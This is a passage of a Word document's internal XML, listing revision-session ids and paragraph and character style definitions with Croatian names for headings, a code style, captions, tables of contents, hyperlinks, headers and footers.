    <w:rsid w:val="00676FA3"/>
    <w:rsid w:val="00696F5A"/>
    <w:rsid w:val="00697D52"/>
    <w:rsid w:val="006A0E35"/>
    <w:rsid w:val="006A317E"/>
    <w:rsid w:val="006A530C"/>
    <w:rsid w:val="006A6EB0"/>
    <w:rsid w:val="006A769A"/>
    <w:rsid w:val="006A7AB2"/>
    <w:rsid w:val="006B0EE1"/>
    <w:rsid w:val="006B31A2"/>
    <w:rsid w:val="006B3D79"/>
    <w:rsid w:val="006C3071"/>
    <w:rsid w:val="006C4152"/>
    <w:rsid w:val="006C7521"/>
    <w:rsid w:val="006D0361"/>
    <w:rsid w:val="006D1087"/>
    <w:rsid w:val="006D23D7"/>
    <w:rsid w:val="006D5050"/>
    <w:rsid w:val="006D553C"/>
    <w:rsid w:val="006D6B14"/>
    <w:rsid w:val="006D7BCE"/>
    <w:rsid w:val="006E27DD"/>
    <w:rsid w:val="006E3F17"/>
    <w:rsid w:val="006F7F4E"/>
    <w:rsid w:val="00701307"/>
    <w:rsid w:val="007042A3"/>
    <w:rsid w:val="0070513C"/>
    <w:rsid w:val="00711A86"/>
    <w:rsid w:val="00713EB5"/>
    <w:rsid w:val="0071443C"/>
    <w:rsid w:val="007168E4"/>
    <w:rsid w:val="00723057"/>
    <w:rsid w:val="007425BB"/>
    <w:rsid w:val="00746CDE"/>
    <w:rsid w:val="00747A1D"/>
    <w:rsid w:val="00747E7A"/>
    <w:rsid w:val="00750888"/>
    <w:rsid w:val="00752208"/>
    <w:rsid w:val="00753010"/>
    <w:rsid w:val="00761AAF"/>
    <w:rsid w:val="00762BC3"/>
    <w:rsid w:val="00766A25"/>
    <w:rsid w:val="007720BA"/>
    <w:rsid w:val="007803D6"/>
    <w:rsid w:val="00780A25"/>
    <w:rsid w:val="00782F6F"/>
    <w:rsid w:val="00785FB2"/>
    <w:rsid w:val="00790325"/>
    <w:rsid w:val="00794E02"/>
    <w:rsid w:val="007A41E5"/>
    <w:rsid w:val="007A5D1B"/>
    <w:rsid w:val="007B1FF1"/>
    <w:rsid w:val="007B3E8C"/>
    <w:rsid w:val="007B454F"/>
    <w:rsid w:val="007B694F"/>
    <w:rsid w:val="007C095D"/>
    <w:rsid w:val="007C3317"/>
    <w:rsid w:val="007D1476"/>
    <w:rsid w:val="007D29F9"/>
    <w:rsid w:val="007D5BE0"/>
    <w:rsid w:val="007E53A3"/>
    <w:rsid w:val="007F0AFC"/>
    <w:rsid w:val="007F0B45"/>
    <w:rsid w:val="007F1DAE"/>
    <w:rsid w:val="007F329F"/>
    <w:rsid w:val="007F3C1F"/>
    <w:rsid w:val="007F6377"/>
    <w:rsid w:val="00801EE3"/>
    <w:rsid w:val="00804D21"/>
    <w:rsid w:val="00805E22"/>
    <w:rsid w:val="00805FFB"/>
    <w:rsid w:val="00811F6A"/>
    <w:rsid w:val="00817327"/>
    <w:rsid w:val="00822106"/>
    <w:rsid w:val="008272AC"/>
    <w:rsid w:val="008302FD"/>
    <w:rsid w:val="008303DC"/>
    <w:rsid w:val="0083161C"/>
    <w:rsid w:val="00831C4D"/>
    <w:rsid w:val="008322AB"/>
    <w:rsid w:val="00833FF4"/>
    <w:rsid w:val="00834EED"/>
    <w:rsid w:val="008379D7"/>
    <w:rsid w:val="00840233"/>
    <w:rsid w:val="008438EB"/>
    <w:rsid w:val="00843941"/>
    <w:rsid w:val="0086242F"/>
    <w:rsid w:val="00866819"/>
    <w:rsid w:val="00867421"/>
    <w:rsid w:val="00870CFF"/>
    <w:rsid w:val="00872FCC"/>
    <w:rsid w:val="00874DA0"/>
    <w:rsid w:val="00877426"/>
    <w:rsid w:val="00877E1F"/>
    <w:rsid w:val="008857F8"/>
    <w:rsid w:val="00890482"/>
    <w:rsid w:val="008925C8"/>
    <w:rsid w:val="00893643"/>
    <w:rsid w:val="008B0097"/>
    <w:rsid w:val="008B33A3"/>
    <w:rsid w:val="008B4C8C"/>
    <w:rsid w:val="008B65E3"/>
    <w:rsid w:val="008B7582"/>
    <w:rsid w:val="008C0B5A"/>
    <w:rsid w:val="008D49F0"/>
    <w:rsid w:val="008E2E81"/>
    <w:rsid w:val="008E3330"/>
    <w:rsid w:val="008E463D"/>
    <w:rsid w:val="008E482A"/>
    <w:rsid w:val="008E5C50"/>
    <w:rsid w:val="008F4BDD"/>
    <w:rsid w:val="009138C1"/>
    <w:rsid w:val="00923678"/>
    <w:rsid w:val="009238DE"/>
    <w:rsid w:val="00925CE0"/>
    <w:rsid w:val="0093397F"/>
    <w:rsid w:val="00934857"/>
    <w:rsid w:val="00935BCB"/>
    <w:rsid w:val="00940107"/>
    <w:rsid w:val="00942A5D"/>
    <w:rsid w:val="009436A5"/>
    <w:rsid w:val="009462B2"/>
    <w:rsid w:val="00955EB1"/>
    <w:rsid w:val="00957B66"/>
    <w:rsid w:val="0096561F"/>
    <w:rsid w:val="00966AF5"/>
    <w:rsid w:val="009830E4"/>
    <w:rsid w:val="009864AF"/>
    <w:rsid w:val="00991309"/>
    <w:rsid w:val="0099402B"/>
    <w:rsid w:val="0099431A"/>
    <w:rsid w:val="00997095"/>
    <w:rsid w:val="009A0110"/>
    <w:rsid w:val="009A4C88"/>
    <w:rsid w:val="009A7863"/>
    <w:rsid w:val="009B2958"/>
    <w:rsid w:val="009B5839"/>
    <w:rsid w:val="009C1245"/>
    <w:rsid w:val="009C5AC6"/>
    <w:rsid w:val="009C6405"/>
    <w:rsid w:val="009D28E3"/>
    <w:rsid w:val="009D2BEB"/>
    <w:rsid w:val="009D5A07"/>
    <w:rsid w:val="009E796F"/>
    <w:rsid w:val="009F2471"/>
    <w:rsid w:val="009F274A"/>
    <w:rsid w:val="009F6D2F"/>
    <w:rsid w:val="00A00D41"/>
    <w:rsid w:val="00A11709"/>
    <w:rsid w:val="00A12BF6"/>
    <w:rsid w:val="00A139E9"/>
    <w:rsid w:val="00A2240B"/>
    <w:rsid w:val="00A2493E"/>
    <w:rsid w:val="00A320FE"/>
    <w:rsid w:val="00A47E8D"/>
    <w:rsid w:val="00A56AEA"/>
    <w:rsid w:val="00A61A74"/>
    <w:rsid w:val="00A761F9"/>
    <w:rsid w:val="00A81F29"/>
    <w:rsid w:val="00A85118"/>
    <w:rsid w:val="00A8531C"/>
    <w:rsid w:val="00AA088B"/>
    <w:rsid w:val="00AA3D26"/>
    <w:rsid w:val="00AB4B54"/>
    <w:rsid w:val="00AB63B3"/>
    <w:rsid w:val="00AC391E"/>
    <w:rsid w:val="00AC608F"/>
    <w:rsid w:val="00AD2105"/>
    <w:rsid w:val="00AE2A14"/>
    <w:rsid w:val="00AE2A81"/>
    <w:rsid w:val="00AE3ACE"/>
    <w:rsid w:val="00AE4C51"/>
    <w:rsid w:val="00AF053A"/>
    <w:rsid w:val="00AF372E"/>
    <w:rsid w:val="00AF6560"/>
    <w:rsid w:val="00B0212E"/>
    <w:rsid w:val="00B10D20"/>
    <w:rsid w:val="00B13973"/>
    <w:rsid w:val="00B13CC5"/>
    <w:rsid w:val="00B13CD3"/>
    <w:rsid w:val="00B34970"/>
    <w:rsid w:val="00B35A13"/>
    <w:rsid w:val="00B50CA3"/>
    <w:rsid w:val="00B51E23"/>
    <w:rsid w:val="00B525E8"/>
    <w:rsid w:val="00B53820"/>
    <w:rsid w:val="00B568AE"/>
    <w:rsid w:val="00B632EE"/>
    <w:rsid w:val="00B642FC"/>
    <w:rsid w:val="00B77F4A"/>
    <w:rsid w:val="00B821D9"/>
    <w:rsid w:val="00B825F5"/>
    <w:rsid w:val="00B832B6"/>
    <w:rsid w:val="00B87AD1"/>
    <w:rsid w:val="00B9514F"/>
    <w:rsid w:val="00B957B1"/>
    <w:rsid w:val="00B97BCE"/>
    <w:rsid w:val="00BA1102"/>
    <w:rsid w:val="00BA144A"/>
    <w:rsid w:val="00BA5D85"/>
    <w:rsid w:val="00BA79E1"/>
    <w:rsid w:val="00BA7A57"/>
    <w:rsid w:val="00BA7D8B"/>
    <w:rsid w:val="00BB1923"/>
    <w:rsid w:val="00BB289F"/>
    <w:rsid w:val="00BB7257"/>
    <w:rsid w:val="00BB79A1"/>
    <w:rsid w:val="00BC156B"/>
    <w:rsid w:val="00BC1B7E"/>
    <w:rsid w:val="00BC5BE6"/>
    <w:rsid w:val="00BC6F0B"/>
    <w:rsid w:val="00BD445C"/>
    <w:rsid w:val="00BD5038"/>
    <w:rsid w:val="00BE15C5"/>
    <w:rsid w:val="00BE230D"/>
    <w:rsid w:val="00BE2699"/>
    <w:rsid w:val="00BF39DD"/>
    <w:rsid w:val="00BF5583"/>
    <w:rsid w:val="00BF7478"/>
    <w:rsid w:val="00BF7497"/>
    <w:rsid w:val="00C032C0"/>
    <w:rsid w:val="00C03DFE"/>
    <w:rsid w:val="00C0670C"/>
    <w:rsid w:val="00C11366"/>
    <w:rsid w:val="00C140CF"/>
    <w:rsid w:val="00C15A7C"/>
    <w:rsid w:val="00C204B4"/>
    <w:rsid w:val="00C224A2"/>
    <w:rsid w:val="00C2359D"/>
    <w:rsid w:val="00C24408"/>
    <w:rsid w:val="00C330FF"/>
    <w:rsid w:val="00C43367"/>
    <w:rsid w:val="00C43DB3"/>
    <w:rsid w:val="00C4505A"/>
    <w:rsid w:val="00C5546A"/>
    <w:rsid w:val="00C63A16"/>
    <w:rsid w:val="00C65DE0"/>
    <w:rsid w:val="00C7194A"/>
    <w:rsid w:val="00C74AEA"/>
    <w:rsid w:val="00C772BF"/>
    <w:rsid w:val="00C7730B"/>
    <w:rsid w:val="00C82A5C"/>
    <w:rsid w:val="00C87C1C"/>
    <w:rsid w:val="00C9372F"/>
    <w:rsid w:val="00C95307"/>
    <w:rsid w:val="00C97C82"/>
    <w:rsid w:val="00CA26E5"/>
    <w:rsid w:val="00CA3705"/>
    <w:rsid w:val="00CB103F"/>
    <w:rsid w:val="00CB16EA"/>
    <w:rsid w:val="00CB24CD"/>
    <w:rsid w:val="00CB25BD"/>
    <w:rsid w:val="00CB339F"/>
    <w:rsid w:val="00CB49FA"/>
    <w:rsid w:val="00CC0980"/>
    <w:rsid w:val="00CC382C"/>
    <w:rsid w:val="00CC3B90"/>
    <w:rsid w:val="00CC5337"/>
    <w:rsid w:val="00CD3E67"/>
    <w:rsid w:val="00CD4AF8"/>
    <w:rsid w:val="00CD6DDE"/>
    <w:rsid w:val="00CD7DE8"/>
    <w:rsid w:val="00CE17D2"/>
    <w:rsid w:val="00CE4119"/>
    <w:rsid w:val="00CE6833"/>
    <w:rsid w:val="00CE7010"/>
    <w:rsid w:val="00CF05AF"/>
    <w:rsid w:val="00CF19FC"/>
    <w:rsid w:val="00CF2155"/>
    <w:rsid w:val="00CF4AD2"/>
    <w:rsid w:val="00D00BE1"/>
    <w:rsid w:val="00D01963"/>
    <w:rsid w:val="00D03B55"/>
    <w:rsid w:val="00D05D9B"/>
    <w:rsid w:val="00D10130"/>
    <w:rsid w:val="00D10C5C"/>
    <w:rsid w:val="00D17D61"/>
    <w:rsid w:val="00D20DF1"/>
    <w:rsid w:val="00D212D3"/>
    <w:rsid w:val="00D22301"/>
    <w:rsid w:val="00D2583E"/>
    <w:rsid w:val="00D316CC"/>
    <w:rsid w:val="00D41FD8"/>
    <w:rsid w:val="00D42951"/>
    <w:rsid w:val="00D45398"/>
    <w:rsid w:val="00D46F7C"/>
    <w:rsid w:val="00D478BF"/>
    <w:rsid w:val="00D50CE2"/>
    <w:rsid w:val="00D5254C"/>
    <w:rsid w:val="00D5261B"/>
    <w:rsid w:val="00D529EE"/>
    <w:rsid w:val="00D55C18"/>
    <w:rsid w:val="00D70CF0"/>
    <w:rsid w:val="00D7792A"/>
    <w:rsid w:val="00D82E6E"/>
    <w:rsid w:val="00D83909"/>
    <w:rsid w:val="00D902FC"/>
    <w:rsid w:val="00D91455"/>
    <w:rsid w:val="00D91F99"/>
    <w:rsid w:val="00DA33C8"/>
    <w:rsid w:val="00DA5842"/>
    <w:rsid w:val="00DA6ED2"/>
    <w:rsid w:val="00DA7875"/>
    <w:rsid w:val="00DB22FA"/>
    <w:rsid w:val="00DB35E1"/>
    <w:rsid w:val="00DC2DF3"/>
    <w:rsid w:val="00DC4D54"/>
    <w:rsid w:val="00DC509B"/>
    <w:rsid w:val="00DD0371"/>
    <w:rsid w:val="00DD22EF"/>
    <w:rsid w:val="00DD4512"/>
    <w:rsid w:val="00DE4951"/>
    <w:rsid w:val="00DE5302"/>
    <w:rsid w:val="00DF62C7"/>
    <w:rsid w:val="00E006AD"/>
    <w:rsid w:val="00E04894"/>
    <w:rsid w:val="00E05D97"/>
    <w:rsid w:val="00E12C07"/>
    <w:rsid w:val="00E12D90"/>
    <w:rsid w:val="00E14CB7"/>
    <w:rsid w:val="00E1533E"/>
    <w:rsid w:val="00E17CC4"/>
    <w:rsid w:val="00E22904"/>
    <w:rsid w:val="00E2465F"/>
    <w:rsid w:val="00E27DE8"/>
    <w:rsid w:val="00E34547"/>
    <w:rsid w:val="00E37AF2"/>
    <w:rsid w:val="00E40B55"/>
    <w:rsid w:val="00E41816"/>
    <w:rsid w:val="00E5047A"/>
    <w:rsid w:val="00E50DAA"/>
    <w:rsid w:val="00E562C2"/>
    <w:rsid w:val="00E56EBA"/>
    <w:rsid w:val="00E645C7"/>
    <w:rsid w:val="00E7021C"/>
    <w:rsid w:val="00E775BD"/>
    <w:rsid w:val="00E85C9B"/>
    <w:rsid w:val="00E901E2"/>
    <w:rsid w:val="00E92292"/>
    <w:rsid w:val="00E92D0D"/>
    <w:rsid w:val="00E96774"/>
    <w:rsid w:val="00EA1DF6"/>
    <w:rsid w:val="00EA4FD6"/>
    <w:rsid w:val="00EA641F"/>
    <w:rsid w:val="00EB0396"/>
    <w:rsid w:val="00EB5A35"/>
    <w:rsid w:val="00EB7517"/>
    <w:rsid w:val="00EC62AD"/>
    <w:rsid w:val="00ED13B2"/>
    <w:rsid w:val="00ED2E75"/>
    <w:rsid w:val="00ED56B2"/>
    <w:rsid w:val="00ED5BAB"/>
    <w:rsid w:val="00EE0A4F"/>
    <w:rsid w:val="00EF07AF"/>
    <w:rsid w:val="00F0242E"/>
    <w:rsid w:val="00F048A7"/>
    <w:rsid w:val="00F1639D"/>
    <w:rsid w:val="00F26A32"/>
    <w:rsid w:val="00F3191C"/>
    <w:rsid w:val="00F335EE"/>
    <w:rsid w:val="00F37E46"/>
    <w:rsid w:val="00F4248E"/>
    <w:rsid w:val="00F44948"/>
    <w:rsid w:val="00F4743E"/>
    <w:rsid w:val="00F47670"/>
    <w:rsid w:val="00F62A95"/>
    <w:rsid w:val="00F65E4A"/>
    <w:rsid w:val="00F72BFB"/>
    <w:rsid w:val="00F73319"/>
    <w:rsid w:val="00F76653"/>
    <w:rsid w:val="00F81B81"/>
    <w:rsid w:val="00F82890"/>
    <w:rsid w:val="00F932C5"/>
    <w:rsid w:val="00FA2076"/>
    <w:rsid w:val="00FB0919"/>
    <w:rsid w:val="00FB5059"/>
    <w:rsid w:val="00FC1828"/>
    <w:rsid w:val="00FC1CD8"/>
    <w:rsid w:val="00FC2885"/>
    <w:rsid w:val="00FC39A5"/>
    <w:rsid w:val="00FC6D35"/>
    <w:rsid w:val="00FC73EB"/>
    <w:rsid w:val="00FD19CE"/>
    <w:rsid w:val="00FD4682"/>
    <w:rsid w:val="00FE129B"/>
    <w:rsid w:val="00FE3D8B"/>
    <w:rsid w:val="00FF21E2"/>
    <w:rsid w:val="00FF2D17"/>
    <w:rsid w:val="00FF37CB"/>
    <w:rsid w:val="00FF4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Obican tekst"/>
    <w:qFormat/>
    <w:rsid w:val="00750888"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00272CCD"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:tabs>
        <w:tab w:val="num" w:pos="432"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="360"/>
      <w:ind w:left="432" w:hanging="432"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00255C85"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="240"/>
      <w:ind w:left="576"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="pl-PL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="360" w:after="180"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:i/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:iCs/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:i/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="Zadanifontodlomka">
    <w:name w:val="Default Paragraph Font"/>
    <w:semiHidden/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="Obinatablica">
    <w:name w:val="Normal Table"/>
    <w:semiHidden/>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="numbering" w:default="1" w:styleId="Bezpopisa">
    <w:name w:val="No List"/>
    <w:semiHidden/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kod">
    <w:name w:val="kod"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B87AD1"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:ind w:left="708"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Naslovtablice">
    <w:name w:val="Naslov tablice"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:rsid w:val="005B2603"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Opisslike">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00ED5BAB"/>
    <w:pPr>
      <w:spacing w:before="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:i/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Slika">
    <w:name w:val="Slika"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Naslovslike"/>
    <w:autoRedefine/>
    <w:rsid w:val="00420979"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mjestoidatum">
    <w:name w:val="Mjesto i datum"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="MjestoidatumChar"/>
    <w:rsid w:val="009138C1"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sadraj1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001F2E0C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="480"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
      </w:tabs>
      <w:spacing w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:noProof/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sadraj2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00ED5BAB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="960"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
      </w:tabs>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sadraj3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00ED5BAB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1440"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
      </w:tabs>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:noProof/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Naslovslike">
    <w:name w:val="Naslov slike"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00B87AD1"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:i/>
      <w:noProof/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MjestoidatumChar">
    <w:name w:val="Mjesto i datum Char"/>
    <w:link w:val="Mjestoidatum"/>
    <w:rsid w:val="009138C1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="hr-HR" w:eastAsia="hr-HR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hiperlink">
    <w:name w:val="hiperlink"/>
    <w:rsid w:val="005B2603"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="22"/>
      <w:u w:val="single"/>
      <w:lang w:val="hr-HR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Autordokumenta">
    <w:name w:val="Autor dokumenta"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Naslov1"/>
    <w:autoRedefine/>
    <w:rsid w:val="009138C1"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Naslovdokumenta">
    <w:name w:val="Naslov dokumenta"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Autordokumenta"/>
    <w:rsid w:val="005B2603"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hiperveza">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00750888"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Zaglavlje">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F73319"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4703"/>
        <w:tab w:val="right" w:pos="9406"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Podnoje">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F73319"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4703"/>
        <w:tab w:val="right" w:pos="9406"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Brojstranice">
    <w:name w:val="page number"/>
    <w:basedOn w:val="Zadanifontodlomka"/>
    <w:rsid w:val="00F73319"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Tekstbalonia">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rsid w:val="001F2E0C"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Odlomakpopisa">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00012366"/>
    <w:pPr>
